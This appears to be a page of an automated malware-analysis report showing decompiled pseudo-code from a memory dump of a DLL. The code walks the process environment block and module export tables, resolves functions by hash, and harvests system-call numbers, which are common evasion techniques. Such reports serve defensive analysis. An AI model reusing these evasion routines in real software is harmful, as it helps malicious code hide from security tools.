									if(_t411 != _t313) {
										continue;
									}
									goto L87;
								}
								_t314 = _t408;
								if(( *_t427 &  *(_t314 + 1) & 0x000000ff) == 0) {
									goto L87;
								}
								if((( *(_t314 + 2) & 0x000000ff) << _t427[2] & 0x00000080) == 0) {
									goto L86;
								}
								goto L87;
							}
							if(_t427[2] == 1) {
								goto L86;
							}
							goto L85;
						}
						if(_t250 == 0x20 || _t250 == 0x22) {
							_t316 = 3;
							_t427[3] = _t316;
							if(_t427[2] > 4 || _t427[2] == 1) {
								goto L86;
							} else {
								goto L87;
							}
						} else {
							if(_t250 == 0x21 || _t250 == 0x23) {
								_t319 = 3;
								_t427[3] = _t319;
								if((_t427[6] & 0xfffffff0) == 0x20) {
									goto L86;
								}
								goto L87;
							} else {
								goto L66;
							}
						}
					}
					if(_t427[3] == 3) {
						L51:
						_t343 = _t343 | 0x00009000;
						 *(_t427[0x10] + 0x18) = _t343;
						goto L52;
					}
					_t412 = _t427[4];
					_t321 = _t250;
					_t427[8] = _t412 + 0x1b9;
					if(_t427[5] == 0) {
						_t413 = _t412 + 0x1a1;
						_t321 = _t250 & 0x000000fe;
					} else {
						_t413 = _t427[8];
						_t427[8] = _t412 + 0x1cb;
					}
					while(_t413 != _t427[8]) {
						if(_t321 ==  *_t413) {
							if((( *(_t413 + 1) & 0x000000ff) << _t427[2] & 0x00000080) == 0) {
								goto L52;
							}
							goto L51;
						}
						_t413 = _t413 + 2;
					}
					goto L51;
				}
			}

0x6f4c9377
0x6f4c937b
0x6f4c9387
0x6f4c938b
0x6f4c938f
0x6f4c9394
0x6f4c9397
0x6f4c9399
0x6f4c939b
0x6f4c939b
0x6f4c939e
0x6f4c93a4
0x6f4c941c
0x6f4c9420
0x6f4c9423
0x6f4c9423
0x6f4c9426
0x00000000
0x6f4c9426
0x6f4c93ab
0x6f4c9413
0x6f4c9417
0x00000000
0x6f4c9417
0x6f4c93b2
0x6f4c940b
0x6f4c940e
0x00000000
0x6f4c940e
0x6f4c93b7
0x6f4c93f5
0x6f4c93fc
0x6f4c93ff
0x6f4c93c8
0x6f4c93c8
0x6f4c93ce
0x00000000
0x00000000
0x6f4c93d3
0x6f4c93ed
0x6f4c93f0
0x00000000
0x6f4c93f0
0x6f4c93d8
0x00000000
0x6f4c93da
0x6f4c93de
0x6f4c93e1
0x00000000
0x6f4c93e1
0x6f4c93d8
0x6f4c9429
0x6f4c9429
0x6f4c9429
0x6f4c9432
0x6f4c943b
0x6f4c943e
0x6f4c9441
0x6f4c9444
0x6f4c9447
0x6f4c944d
0x6f4c948f
0x6f4c9492
0x6f4c9493
0x6f4c949a
0x6f4c949d
0x6f4c944f
0x6f4c9453
0x6f4c945d
0x6f4c9464
0x6f4c9466
0x6f4c947f
0x6f4c9482
0x6f4c9482
0x6f4c9464
0x6f4c94a5
0x6f4c94a8
0x6f4c94ab
0x6f4c94af
0x6f4c94b3
0x6f4c94bd
0x6f4c94c1
0x6f4c94cb
0x6f4c94d4
0x6f4c94e1
0x6f4c94e4
0x6f4c94e7
0x6f4c94e7
0x6f4c94f3
0x6f4c94fe
0x6f4c9504
0x6f4c9508
0x6f4c94f5
0x6f4c94f5
0x6f4c94f5
0x6f4c9510
0x6f4c953a
0x6f4c9540
0x6f4c9540
0x6f4c9548
0x6f4c98f1
0x6f4c98f7
0x6f4c98fd
0x6f4c98fd
0x00000000
0x6f4c954e
0x6f4c954e
0x6f4c9552
0x6f4c9555
0x6f4c9558
0x6f4c955b
0x6f4c955f
0x6f4c9561
0x6f4c9564
0x6f4c9567
0x6f4c956b
0x6f4c9570
0x6f4c9573
0x6f4c9577
0x6f4c957c
0x6f4c957f
0x6f4c9581
0x6f4c9584
0x6f4c9588
0x6f4c958d
0x6f4c959d
0x6f4c95a3
0x6f4c95a3
0x6f4c95ab
0x6f4c95ad
0x6f4c95b6
0x6f4c95b8
0x6f4c95bb
0x6f4c95c6
0x6f4c95f3
0x6f4c95c8
0x6f4c95df
0x6f4c95df
0x6f4c95fb
0x6f4c9601
0x6f4c9607
0x6f4c9607
0x6f4c95fb
0x6f4c95b6
0x6f4c960e
0x6f4c967f
0x6f4c9684
0x6f4c96dd
0x6f4c979f
0x6f4c97a4
0x6f4c97b3
0x6f4c97b9
0x6f4c97bd
0x6f4c97c6
0x6f4c97cd
0x6f4c97d6
0x6f4c97e4
0x6f4c97e7
0x6f4c97cf
0x6f4c97cf
0x6f4c97cf
0x6f4c97cd
0x6f4c97f0
0x6f4c981d
0x6f4c9830
0x6f4c9838
0x6f4c981f
0x6f4c9821
0x6f4c9829
0x6f4c9829
0x6f4c97f2
0x6f4c97f7
0x6f4c9816
0x6f4c97f9
0x6f4c97fe
0x6f4c980f
0x6f4c9800
0x6f4c9800
0x6f4c9800
0x6f4c97fe
0x6f4c97f7
0x6f4c9840
0x6f4c984f
0x6f4c985c
0x6f4c9865
0x6f4c9869
0x6f4c986d
0x6f4c9870
0x6f4c9873
0x6f4c9876
0x6f4c9879
0x6f4c987c
0x6f4c9882
0x6f4c9886
0x6f4c988c
0x6f4c988c
0x6f4c9882
0x6f4c9892
0x6f4c98cf
0x6f4c98d3
0x6f4c98da
0x6f4c98e0
0x6f4c9894
0x6f4c9897
0x6f4c98b7
0x6f4c98bb
0x6f4c98c2
0x6f4c98c9
0x6f4c9899
0x6f4c989c
0x6f4c989e
0x6f4c98a2
0x6f4c98ac
0x6f4c98b2
0x6f4c98b2
0x6f4c989c
0x6f4c9897
0x6f4c98e7
0x6f4c98e7
0x6f4c9900
0x6f4c9900
0x6f4c9906
0x6f4c990b
0x6f4c9965
0x6f4c996a
0x6f4c99a9
0x6f4c99ae
0x6f4c99b0
0x6f4c99b4
0x6f4c99b7
0x6f4c99ba
0x6f4c99bc
0x6f4c99bd
0x6f4c99bd
0x6f4c99c2
0x6f4c99e0
0x6f4c99e2
0x6f4c99e6
0x6f4c99ec
0x6f4c99ef
0x6f4c99f1
0x6f4c99f2
0x6f4c99f2
0x00000000
0x6f4c99c4
0x6f4c99c4
0x6f4c99c4
0x6f4c99c8
0x6f4c99ce
0x6f4c99d1
0x6f4c99d3
0x6f4c99d6
0x6f4c99f5
0x6f4c99f5
0x6f4c99fc
0x6f4c9a16
0x6f4c99fe
0x6f4c99fe
0x6f4c9a0a
0x6f4c9a0b
0x6f4c9a0e
0x6f4c9a0e
0x6f4c9a24
0x6f4c9a24
0x6f4c99c2
0x6f4c996f
0x6f4c997d
0x6f4c9995
0x6f4c9999
0x6f4c999c
0x6f4c99a2
0x6f4c99a6
0x6f4c99a6
0x00000000
0x6f4c99a6
0x6f4c997f
0x6f4c9983
0x6f4c9989
0x6f4c9989
0x6f4c998f
0x00000000
0x6f4c998f
0x6f4c9971
0x6f4c9975
0x00000000
0x6f4c9975
0x6f4c990f
0x6f4c993b
0x6f4c9953
0x6f4c9957
0x6f4c995a
0x6f4c995d
0x6f4c995f
0x6f4c9962
0x6f4c993d
0x6f4c993d
0x6f4c9941
0x6f4c9944
0x6f4c9947
0x6f4c994a
0x6f4c994d
0x6f4c994d
0x00000000
0x6f4c993b
0x6f4c9915
0x00000000
0x00000000
0x6f4c991b
0x6f4c991f
0x6f4c9925
0x6f4c9928
0x6f4c992b
0x6f4c992e
0x00000000
0x6f4c992e
0x6f4c97a6
0x6f4c97aa
0x6f4c97b0
0x00000000
0x6f4c97b0
0x6f4c96e8
0x6f4c96fa
0x6f4c96ff
0x6f4c976a
0x00000000
0x00000000
0x6f4c9771
0x6f4c9797
0x6f4c979b
0x00000000
0x00000000
0x6f4c977a
0x6f4c977f
0x6f4c9793
0x00000000
0x00000000
0x00000000
0x6f4c9795
0x6f4c9786
0x00000000
0x00000000
0x6f4c978b
0x00000000
0x00000000
0x6f4c978d
0x00000000
0x6f4c9771
0x6f4c9701
0x6f4c970b
0x6f4c971c
0x6f4c971f
0x6f4c9722
0x6f4c9728
0x00000000
0x00000000
0x00000000
0x00000000
0x6f4c972e
0x6f4c972e
0x6f4c972e
0x6f4c9735
0x00000000
0x00000000
0x6f4c9737
0x6f4c973a
0x6f4c9740
0x00000000
0x00000000
0x00000000
0x6f4c9742
0x6f4c9744
0x6f4c974d
0x00000000
0x00000000
0x6f4c9761
0x00000000
0x00000000
0x00000000
0x6f4c9763
0x6f4c96ef
0x00000000
0x00000000
0x00000000
0x6f4c96f5
0x6f4c9689
0x6f4c96b8
0x6f4c96b9
0x6f4c96c2
0x00000000
0x6f4c96d3
0x00000000
0x6f4c96d3
0x6f4c9690
0x6f4c9693
0x6f4c96a6
0x6f4c96a7
0x6f4c96ab
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6f4c9693
0x6f4c9689
0x6f4c9615
0x6f4c9672
0x6f4c9676
0x6f4c967c
0x00000000
0x6f4c967c
0x6f4c9617
0x6f4c961b
0x6f4c9628
0x6f4c962c
0x6f4c9642
0x6f4c964a
0x6f4c962e
0x6f4c9630
0x6f4c963a
0x6f4c963a
0x6f4c9650
0x6f4c9659
0x6f4c9670
0x00000000
0x00000000
0x00000000
0x6f4c9670
0x6f4c965b
0x6f4c965b
0x00000000
0x6f4c9650

Strings

, xrefs: 6F4C99DB

Memory Dump Source

Source File: 00000000.00000002.749937166.000000006F4B1000.00000020.00020000.sdmp, Offset: 6F4B0000, based on PE: true

Associated: 00000000.00000002.749920504.000000006F4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.749980349.000000006F4CA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.749998070.000000006F4CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.750012504.000000006F4CF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 407fd4848e5b307e07d906eea16bb6147e298fc8bb87a15a6d3895badca8086c
Instruction ID: 6b621429bdb2a7a054d9a9e7863b5aef4054858dc7ea9f870e5dd7eedf753d2f
Opcode Fuzzy Hash: 407fd4848e5b307e07d906eea16bb6147e298fc8bb87a15a6d3895badca8086c
Instruction Fuzzy Hash: B122D43840D385EBD714CE15C49176ABFE1BF86308F00996EE8E50BB99D336A945CB93

Uniqueness

Uniqueness Score: -1.00%

Function 6F4C143C, Relevance: .6, Instructions: 572
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E6F4C143C(signed char __eax, signed char __edx) {
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed char _t231;
				signed char _t233;
				signed char _t238;
				intOrPtr _t241;
				void* _t246;
				signed char _t257;
				signed char _t261;
				signed char _t269;
				signed char _t270;
				signed char _t277;
				signed int _t279;
				signed char _t280;
				signed char _t281;
				void* _t289;
				void* _t290;
				signed char _t315;
				void* _t319;
				signed char _t334;
				signed char _t336;
				void* _t341;
				void* _t347;
				intOrPtr _t352;
				signed char _t354;
				signed char _t363;
				void* _t369;
				intOrPtr _t371;
				signed short* _t373;
				void _t375;
				void* _t379;
				signed int _t381;
				void* _t382;
				void** _t383;
				void* _t384;
				char* _t387;
				signed char _t395;
				signed char* _t396;
				intOrPtr _t400;
				signed int _t451;
				intOrPtr* _t455;
				signed char _t456;
				signed int _t462;
				void* _t467;
				signed char _t471;
				signed char _t472;
				signed char* _t477;
				signed char _t487;
				signed int _t490;
				intOrPtr* _t496;
				intOrPtr _t497;
				signed char _t498;
				signed char _t499;
				intOrPtr _t500;
				signed char _t508;
				intOrPtr _t510;
				void* _t513;
				signed char _t519;
				intOrPtr* _t524;
				signed char _t525;
				signed char _t526;
				signed char _t527;
				signed char _t529;
				signed char* _t531;
				signed char _t532;
				void* _t533;
				void* _t534;
				signed char* _t535;

				_t535[0x54] = __edx;
				 *_t535 = __eax;
				_t231 = E6F4C0304(__edx, 1);
				if(_t231 != 0) {
					return _t231;
				}
				_t535[0x2c] = _t231;
				if( *0x6f4cd208 == 0 ||  *0x6f4cd2e4 != 0) {
					L44:
					if( *_t535 == 0) {
						return 0;
					}
					_t233 =  *_t535;
					_t371 =  *((intOrPtr*)(_t233 + 0x3c));
					_t510 =  *((intOrPtr*)(_t371 + _t233 + 0x78));
					_t535[0x130] =  *((intOrPtr*)(_t371 + _t233 + 0x7c)) + _t510;
					_t524 =  *((intOrPtr*)(_t510 + _t233 + 0x20)) + _t233;
					_t373 =  *((intOrPtr*)(_t510 + _t233 + 0x24)) + _t233;
					if( *((intOrPtr*)(_t510 + _t233 + 0x18)) <= 0) {
						L77:
						 *_t535 = 0;
						_t535[0x2c] = 0;
						L78:
						return  *_t535;
					}
					_t535[0x12c] = 0;
					_t535[0x174] = _t535[0x54] ^ 0xe462d21c;
					do {
						_t467 = 0;
						_t387 =  *_t524 +  *_t535;
						_t238 =  *_t387;
						_t535[0x58] = _t238;
						if(_t238 == 0) {
							L49:
							if(E6F4C4FFC( &(_t535[0x58]), _t467) == _t535[0x174]) {
								_t535[0x2c] = 0;
								_t241 =  *((intOrPtr*)( *((intOrPtr*)(_t510 +  *_t535 + 0x1c)) +  *_t535 + ( *_t373 & 0x0000ffff) * 4));
								__eflags = _t241 - _t510;
								if(_t241 < _t510) {
									L57:
									_t471 =  *_t535 + _t241;
									__eflags = _t471;
									 *_t535 = _t471;
									_t535[0x2c] = _t471;
									L58:
									__eflags =  *_t535;
									if( *_t535 == 0) {
										goto L78;
									}
									__eflags =  *0x6f4cd2f0 |  *0x6f4cd2f1;
									if(( *0x6f4cd2f0 |  *0x6f4cd2f1) == 0) {
										_t525 =  *0x6f4cd208; // 0x28b1340
										__eflags = _t525;
										if(_t525 == 0) {
											 *0x6f4cd2f0 = 1;
											_t526 = E6F4C361C(0x1c4);
											__eflags = _t526;
											if(_t526 == 0) {
												_t526 = 0;
												__eflags = 0;
											} else {
												E6F4C1C30(_t526, 0x10);
												 *(_t526 + 0x1c0) = 0;
											}
											 *0x6f4cd208 = _t526;
											 *0x6f4cd2f0 = 0;
											L68:
											_t246 = 0;
											_t472 = 0;
											__eflags = 0;
											while(1) {
												__eflags =  *(_t472 + _t526 + 8);
												if( *(_t472 + _t526 + 8) == 0) {
													break;
												}
												_t246 = _t246 + 1;
												_t472 = _t472 + 0x1c;
												__eflags = _t246 - 0x10;
												if(_t246 < 0x10) {
													continue;
												}
												_t375 = E6F4C361C(0x1c4);
												__eflags = _t375;
												if(_t375 == 0) {
													_t375 = 0;
													__eflags = 0;
												} else {
													E6F4C1C30(_t375, 0x10);
													 *(_t375 + 0x1c0) = 0;
												}
												 *(_t375 + 0x14) = _t535[0x2c];
												E6F4BDFC0(_t375,  &(_t535[0x58]));
												 *(_t375 + 8) = _t535[0x54];
												 *(_t526 + 0x1c0) = _t375;
												L76:
												 *_t535 = _t535[0x2c];
												goto L78;
											}
											_t527 = _t526 + _t472;
											__eflags = _t527;
											 *((intOrPtr*)(_t527 + 0x14)) =  *((intOrPtr*)( &(_t535[0x58]) - 0x2c));
											E6F4BDFC0(_t527,  &(_t535[0x58]));
											 *(_t527 + 8) = _t535[0x54];
											goto L76;
										}
										_t257 =  *(_t525 + 0x1c0);
										while(1) {
											__eflags = _t257;
											if(_t257 == 0) {
												goto L68;
											}
											_t526 = _t257;
											_t257 =  *(_t257 + 0x1c0);
										}
										goto L68;
									}
									__eflags = _t535[0x54] - 0x1c6ef387;
									if(_t535[0x54] == 0x1c6ef387) {
										 *0x6f4cd20c =  *_t535;
									} else {
										__eflags = _t535[0x54] - 0x45b68b68;
										if(_t535[0x54] == 0x45b68b68) {
											 *0x6f4cd210 =  *_t535;
										}
									}
									goto L78;
								}
								__eflags = _t241 - _t535[0x130];
								if(_t241 >= _t535[0x130]) {
									goto L57;
								}
								_t535[0x130] =  &(_t535[0x58]);
								_t261 = E6F4BE8A8( &(_t535[0x58]), 0x7fffffff);
								_t477 =  &(_t535[0x12c]);
								 *_t477 = _t261;
								_t477[2] = _t261 + 1;
								_t395 = E6F4C306C(0x60a28c5c, 0x522ec1f2, 0x60a28c5c, 0x60a28c5c);
								__eflags = _t395;
								if(_t395 != 0) {
									_t202 =  &(_t535[0x12c]); // 0x100
									 *_t395(_t535[0xc], _t202, 0,  &(_t535[0x2c]));
								}
								 *_t535 = _t535[0x2c];
								goto L58;
							}
							goto L50;
						} else {
							goto L48;
						}
						do {
							L48:
							_t467 = _t467 + 1;
							_t270 =  *((intOrPtr*)(_t467 + _t387));
							_t535[_t467 + 0x58] = _t270;
						} while (_t270 != 0);
						goto L49;
						L50:
						_t524 = _t524 + 4;
						_t396 =  &(_t535[0x12c]);
						_t373 =  &(_t373[1]);
						_t269 =  *_t396 + 1;
						 *_t396 = _t269;
					} while (_t269 <  *((intOrPtr*)(_t510 +  *_t535 + 0x18)));
					goto L77;
				} else {
					_t535[0x30] = 0;
					 *0x6f4cd2e4 = 1;
					E6F4BF584( &(_t535[0x38]), 0);
					E6F4BF584( &(_t535[0x168]), 0x1c);
					_t535[0x58] = E6F4BF4BC( &(_t535[0x168]), 0);
					_t400 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc));
					_t535[0x48] =  *(_t400 + 0xc);
					_t535[0x60] =  *(_t400 + 0x10);
					goto L5;
					L6:
					_t384 = 0;
					do {
						if(( *(_t529 + 0x24) & 0x20000000) == 0) {
							goto L13;
						}
						_t513 =  *((intOrPtr*)(_t529 + 0xc)) + _t535[0x58] +  *((intOrPtr*)(_t529 + 8));
						_t496 = E6F4C306C(0x60a28c5c, 0xe7942190, _t279, _t279);
						if(_t496 == 0) {
							L10:
							_t456 = _t535[0x50];
							_t497 =  *((intOrPtr*)(_t529 + 0xc));
							_t498 = _t497 + _t456;
							_t500 =  *((intOrPtr*)(_t529 + 8));
							_t535[0x28] = _t498;
							_t499 = _t498 + _t500;
							_t363 =  *(_t535[0x58]) - _t456 - _t497 - _t500 -  *((intOrPtr*)(_t535[0x58] + 0xc));
							_t535[0x24] = _t529;
							_t535[0x20] =  *(_t535[0x48] + 0x30);
							if((_t499 & 0x00000003) == 0) {
								L12:
								_t535[0x1c] = _t363;
								_t535[0x18] = _t499;
								E6F4BF828( &(_t535[0xc]), E6F4BF4CC( &(_t535[8])) + 0x14);
								_t369 = E6F4BF4BC( &(_t535[0xc]), E6F4BF4CC( &(_t535[8])) + 0xffffffec);
								_t462 = 5;
								_t279 = memcpy(_t369,  &(_t535[0x18]), _t462 << 2);
								_t535 =  &(_t535[0xc]);
								_t535[4] = _t535[4] + 1;
								goto L13;
							} else {
								goto L11;
							}
							do {
								L11:
								_t499 = _t499 + 1;
								_t363 = _t363 - 1;
							} while ((_t499 & 0x00000003) != 0);
							goto L12;
						}
						_t279 =  *_t496(0xffffffff, _t513, 0, _t535[0x60], 0x1c, 0);
						if(0 < 0) {
							goto L13;
						}
						goto L10;
						L13:
						_t384 = _t384 + 1;
						_t529 = _t529 + 0x28;
					} while (_t384 < _t535[0x5c]);
					L14:
					_t280 = _t535[4];
					_t535[0x44] = _t280;
					if(_t280 <= 1) {
						L21:
						if(_t535[0x44] <= 0) {
							L24:
							_t281 = _t535[0x48];
							_t556 = _t281 - _t535[0x60];
							if(_t281 != _t535[0x60]) {
								_t535[0x48] =  *_t281;
								E6F4BF654( &(_t535[8]));
								L5:
								_t277 =  *(_t535[0x48] + 0x18);
								_t535[0x50] = _t277;
								_t535[4] = 0;
								_t379 =  *((intOrPtr*)(_t277 + 0x3c)) + _t277;
								E6F4BF584( &(_t535[0xc]), 0);
								_t279 =  *(_t379 + 6) & 0x0000ffff;
								_t535[0x5c] = _t279;
								_t529 = _t379 + ( *(_t379 + 0x14) & 0x0000ffff) + 0x18;
								if(_t279 <= 0) {
									goto L14;
								}
								goto L6;
							}
							E6F4BF654( &(_t535[8]));
							E6F4BF654( &(_t535[0x164]));
							E6F4BF584( &(_t535[0x48]), 0);
							_t535[0x18] = 0;
							E6F4BF584( &(_t535[0x20]), 0);
							_push(0x60a28c5c);
							_t289 = E6F4C1D34(0x60a28c5c);
							_t290 = E6F4C12EC( &(_t535[0x154]), _t517, _t556);
							_push(_t290);
							_push(_t290);
							E6F4C1C6C( &(_t535[0x164]), 0x60a28c5c);
							_t518 =  &(_t535[0x178]);
							E6F4BD014( &(_t535[0x178]) - 0x24,  &(_t535[0x178]), _t535[0x15c]);
							_push(0x80);
							_push(0);
							E6F4C5CD4( &(_t535[0x114]), _t556, _t535[0x184], 1);
							E6F4C5D08( &(_t535[0x180]) - 0x7c, _t556,  &(_t535[0x180]), 0);
							_push(_t289);
							E6F4C8E08( &(_t535[0xe4]),  &(_t535[0x180]), 2);
							E6F4BF654( &(_t535[0x180]));
							_t557 = _t535[0x114];
							if(_t535[0x114] != 0) {
								E6F4BBB44( &(_t535[0x110]));
							}
							E6F4BCFDC( &(_t535[0x104]));
							E6F4BCFDC(_t518);
							E6F4BCFDC( &(_t535[0x15c]));
							E6F4BCFDC( &(_t535[0x154]));
							E6F4C90EC( &(_t535[0xdc]), 0xffffffff);
							_t535[0x118] = _t535[0xf0];
							E6F4BF618( &(_t535[0x11c]), _t557,  &(_t535[0xf4]));
							_push(1);
							E6F4C90B0( &(_t535[0x11c]));
							_t381 = 0;
							_t535[0x64] = 0;
							_t535[0x60] = 0;
							do {
								_t535[0x58] = E6F4BF4BC( &(_t535[0x38]), _t535[0x60]);
								_t535[0x70] = E6F4BF4CC( &(_t535[0x44]));
								_t519 =  *(0x6f4cbd40 + _t381 * 4);
								_t531 = E6F4C907C( &(_t535[0xf4]), _t519, _t519);
								if(_t531 == 0) {
									goto L42;
								}
								_t508 = E6F4C87E8( &(_t535[0x11c]), _t519,  *_t531);
								_t532 =  *_t531;
								while(_t532 ==  *_t508) {
									_t508 = _t508 + 8;
									__eflags = _t508;
								}
								_t315 =  *_t508;
								_t535[0x74] = _t315;
								_t535[0x78] = _t315 - _t532;
								if(_t381 != 0) {
									L38:
									_t535[0x68] = E6F4BF4CC( &(_t535[0x44]));
									_t535[0x6c] = _t519;
									E6F4BF4DC( &(_t535[0x4c]), _t562, _t532, _t535[0x78]);
									_t319 = E6F4BF4CC( &(_t535[0x44]));
									_t487 = _t535[0x58];
									_t563 = _t319 -  *((intOrPtr*)(_t487 + 4));
									if(_t319 <=  *((intOrPtr*)(_t487 + 4))) {
										E6F4BF828( &(_t535[0x20]), E6F4BF4CC( &(_t535[0x1c])) + 8);
										E6F4BF4BC( &(_t535[0x20]), E6F4BF4CC( &(_t535[0x1c])) + 0xfffffff8);
										asm("movsd");
										asm("movsd");
										_t535[0x18] = _t535[0x18] + 1;
										__eflags = _t381 - 0x1d;
										if(__eflags == 0) {
											_t228 =  &(_t535[0x44]); // 0x2c
											E6F4C317C(_t535[0x58], _t228, __eflags,  &(_t535[0x18]));
										}
										goto L42;
									}
									E6F4BF828( &(_t535[0x48]), _t535[0x70]);
									E6F4C317C(_t535[0x58],  &(_t535[0x44]), _t563,  &(_t535[0x18]));
									E6F4BF840( &(_t535[0x44]), _t563);
									E6F4BF840( &(_t535[0x1c]), _t563);
									_t381 = _t381 - 1;
									_t334 = _t535[0x64] + 1;
									_t535[0x60] = _t535[0x60] + 0x14;
									_t535[0x18] = 0;
									_t535[0x64] = _t334;
									if(_t334 == _t535[0x30]) {
										break;
									}
									goto L42;
								}
								E6F4C913C( &(_t535[0x134]), _t519);
								_t535[0x5c] = _t532;
								while(1) {
									_t336 = _t535[0x5c];
									_t562 =  *_t336 - 0xb8;
									if( *_t336 == 0xb8) {
										break;
									}
									_t490 = _t535[0x5c] + E6F4C9104( &(_t535[0x138]), __eflags, _t535[0x74]);
									_t535[0x5c] = _t490;
									__eflags = _t490 -  *_t508;
									if(__eflags < 0) {
										continue;
									}
									L37:
									E6F4BF654( &(_t535[0x144]));
									E6F4BF654( &(_t535[0x134]));
									goto L38;
								}
								 *0x6f4cd2ec =  *((intOrPtr*)(_t336 + 1));
								goto L37;
								L42:
								_t381 = _t381 + 1;
							} while (_t381 < 0x1e);
							E6F4BF654( &(_t535[0x11c]));
							E6F4C8E68(_t381,  &(_t535[0xd8]));
							E6F4BF654( &(_t535[0x1c]));
							E6F4BF654( &(_t535[0x44]));
							E6F4BF654( &(_t535[0x34]));
							goto L44;
						}
						_t533 = 0;
						_t382 = 0;
						do {
							_t341 = E6F4BF4BC( &(_t535[0xc]), _t382);
							_t517 = _t341;
							E6F4BF828( &(_t535[0x38]), E6F4BF4CC( &(_t535[0x34])) + 0x14);
							_t347 = E6F4BF4BC( &(_t535[0x38]), E6F4BF4CC( &(_t535[0x34])) + 0xffffffec);
							_t451 = 5;
							memcpy(_t347, _t341, _t451 << 2);
							_t535 =  &(_t535[0xc]);
							_t533 = _t533 + 1;
							_t382 = _t382 + 0x14;
							_t535[0x30] = _t535[0x30] + 1;
						} while (_t533 < _t535[0x44]);
						goto L24;
					}
					_t535[0x4c] = 1;
					_t534 = 0x14;
					do {
						_t62 = _t534 - 0x14; // 0x0
						_t383 = E6F4BF4BC( &(_t535[0xc]), _t62);
						_t455 = E6F4BF4BC( &(_t535[0xc]), _t534);
						_t517 =  *_t383;
						_t352 =  *_t455;
						if(_t352 >= _t517 && _t352 <= _t383[1] + _t517) {
							_t383[1] =  *((intOrPtr*)(_t455 + 0x10)) - _t517;
						}
						_t534 = _t534 + 0x14;
						_t354 = _t535[0x4c] + 1;
						_t535[0x4c] = _t354;
					} while (_t354 < _t535[0x44]);
					_t535[0x44] = _t535[4];
					goto L21;
				}
			}

0x6f4c1448
0x6f4c144f
0x6f4c1452
0x6f4c1459
0x6f4c1bdb
0x6f4c1bdb
0x6f4c145f
0x6f4c146a
0x6f4c19a9
0x6f4c19ad
0x00000000
0x6f4c1c2c
0x6f4c19b3
0x6f4c19b6
0x6f4c19b9
0x6f4c19c3
0x6f4c19d2
0x6f4c19d4
0x6f4c19db
0x6f4c1bc5
0x6f4c1bc7
0x6f4c1bca
0x6f4c1bce
0x00000000
0x6f4c1bce
0x6f4c19ea
0x6f4c19f5
0x6f4c19fc
0x6f4c19ff
0x6f4c1a01
0x6f4c1a04
0x6f4c1a07
0x6f4c1a0d
0x6f4c1a1b
0x6f4c1a2b
0x6f4c1a50
0x6f4c1a61
0x6f4c1a64
0x6f4c1a66
0x6f4c1aca
0x6f4c1acd
0x6f4c1acd
0x6f4c1acf
0x6f4c1ad2
0x6f4c1ad6
0x6f4c1ad6
0x6f4c1ada
0x00000000
0x00000000
0x6f4c1ae7
0x6f4c1aed
0x6f4c1b21
0x6f4c1b27
0x6f4c1b29
0x6f4c1bf8
0x6f4c1c00
0x6f4c1c03
0x6f4c1c05
0x6f4c1c1c
0x6f4c1c1c
0x6f4c1c07
0x6f4c1c0b
0x6f4c1c10
0x6f4c1c10
0x6f4c1c1e
0x6f4c1c24
0x6f4c1b43
0x6f4c1b43
0x6f4c1b45
0x6f4c1b45
0x6f4c1b47
0x6f4c1b47
0x6f4c1b4c
0x00000000
0x00000000
0x6f4c1b4e
0x6f4c1b4f
0x6f4c1b52
0x6f4c1b55
0x00000000
0x00000000
0x6f4c1b61
0x6f4c1b64
0x6f4c1b66
0x6f4c1b7d
0x6f4c1b7d
0x6f4c1b68
0x6f4c1b6c
0x6f4c1b71
0x6f4c1b71
0x6f4c1b8a
0x6f4c1b8d
0x6f4c1b96
0x6f4c1b99
0x6f4c1bbc
0x6f4c1bc0
0x00000000
0x6f4c1bc0
0x6f4c1ba1
0x6f4c1ba1
0x6f4c1bad
0x6f4c1bb0
0x6f4c1bb9
0x00000000
0x6f4c1bb9
0x6f4c1b2f
0x6f4c1b3f
0x6f4c1b3f
0x6f4c1b41
0x00000000
0x00000000
0x6f4c1b37
0x6f4c1b39
0x6f4c1b39
0x00000000
0x6f4c1b3f
0x6f4c1aef
0x6f4c1af7
0x6f4c1b17
0x6f4c1af9
0x6f4c1af9
0x6f4c1b01
0x6f4c1b0a
0x6f4c1b0a
0x6f4c1b01
0x00000000
0x6f4c1af7
0x6f4c1a68
0x6f4c1a6f
0x00000000
0x00000000
0x6f4c1a7c
0x6f4c1a82
0x6f4c1a87
0x6f4c1a8e
0x6f4c1a92
0x6f4c1aa7
0x6f4c1aa9
0x6f4c1aab
0x6f4c1ab1
0x6f4c1abf
0x6f4c1abf
0x6f4c1ac5
0x00000000
0x6f4c1ac5
0x00000000
0x00000000
0x00000000
0x00000000
0x6f4c1a0f
0x6f4c1a0f
0x6f4c1a0f
0x6f4c1a10
0x6f4c1a13
0x6f4c1a17
0x00000000
0x6f4c1a2d
0x6f4c1a30
0x6f4c1a33
0x6f4c1a3c
0x6f4c1a3f
0x6f4c1a40
0x6f4c1a42
0x00000000
0x6f4c147d
0x6f4c147f
0x6f4c1484
0x6f4c148f
0x6f4c149d
0x6f4c14b0
0x6f4c14bd
0x6f4c14c6
0x6f4c14ca
0x6f4c14ce
0x6f4c1516
0x6f4c1516
0x6f4c1518
0x6f4c151f
0x00000000
0x00000000
0x6f4c1538
0x6f4c1540
0x6f4c1544
0x6f4c1559
0x6f4c155d
0x6f4c1561
0x6f4c156a
0x6f4c1570
0x6f4c1573
0x6f4c1577
0x6f4c157f
0x6f4c1581
0x6f4c1585
0x6f4c158c
0x6f4c1595
0x6f4c1595
0x6f4c1599
0x6f4c15ae
0x6f4c15c4
0x6f4c15d1
0x6f4c15d2
0x6f4c15d2
0x6f4c15d4
0x00000000
0x00000000
0x00000000
0x00000000
0x6f4c158e
0x6f4c158e
0x6f4c158e
0x6f4c158f
0x6f4c1590
0x00000000
0x6f4c158e
0x6f4c1553
0x6f4c1557
0x00000000
0x00000000
0x00000000
0x6f4c15d8
0x6f4c15d8
0x6f4c15d9
0x6f4c15dc
0x6f4c15e6
0x6f4c15e6
0x6f4c15ea
0x6f4c15f1
0x6f4c164c
0x6f4c1651
0x6f4c16a4
0x6f4c16a4
0x6f4c16a8
0x6f4c16ac
0x6f4c14d6
0x6f4c14d9
